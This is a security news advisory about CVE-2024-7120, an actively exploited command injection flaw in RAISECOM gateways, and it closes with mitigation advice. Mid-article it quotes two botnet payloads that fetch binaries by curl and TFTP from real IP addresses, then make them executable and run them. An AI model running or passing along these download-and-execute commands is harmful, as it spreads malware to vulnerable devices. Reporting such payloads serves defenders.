Cyber Security News

Critical Flaw in RAISECOM Gateways Actively Exploited, Exposing Thousands to Remote Attacks

Cyware

Summary: A critical vulnerability (CVE-2024-7120) in RAISECOM Gateway devices allows remote attackers to execute arbitrary commands, posing a severe threat to enterprise security. Exploitation of this flaw has been actively observed, with attacks leveraging easily accessible proof-of-concept code.

Threat Actor: Unknown | unknown
Victim: RAISECOM Gateway devices | RAISECOM Gateway devices

Key Point :

  • The vulnerability has a critical CVSS score of 9.8, allowing for remote command execution.
  • Attacks have been observed since early September, with specific payloads identified for malware execution.
  • Immediate mitigation actions include restricting access, implementing input validation, and enhancing network monitoring.

A newly discovered and actively exploited vulnerability in RAISECOM Gateway devices poses a significant threat to enterprise security. The flaw, tracked as CVE-2024-7120 with a critical CVSS score of 9.8, allows remote attackers to execute arbitrary commands on affected devices, potentially leading to unauthorized access, data breaches, and system compromise.

The command injection vulnerability resides within the list_base_config.php script of the web interface, impacting RAISECOM Gateway models MSG1200, MSG2100E, MSG2200, and MSG2300 running software version 3.90. Security researchers have confirmed the ease of exploitation, with proof-of-concept code readily available.

Threat actors are actively leveraging this vulnerability, with attacks observed since early September, peaking around September 12th-13th.

Security expert Johannes B. Ullrich, Ph.D., Dean of Research, has identified two distinct payloads used in the attacks. These payloads, designed to download and execute malware, show evidence of regular botnets scanning for and compromising vulnerable routers.

First payload:

 cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

Second payload (using TFTP instead of HTTP):

 cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

While RAISECOM has yet to release a patch, immediate action is crucial to mitigate the risk:

  • Restrict Access: Limit access to the device’s web interface to trusted networks and authorized personnel only.
  • Input Validation: Implement stringent input validation and sanitization procedures on the web interface to prevent malicious code injection.
  • Network Monitoring: Employ robust network monitoring and intrusion detection systems to identify and respond to any suspicious activity.

Related Posts:

Source: https://securityonline.info/critical-flaw-in-raisecom-gateways-actively-exploited-exposing-thousands-to-remote-attacks

Tags: CVE, VULNERABILITY, PAYLOAD, PATCH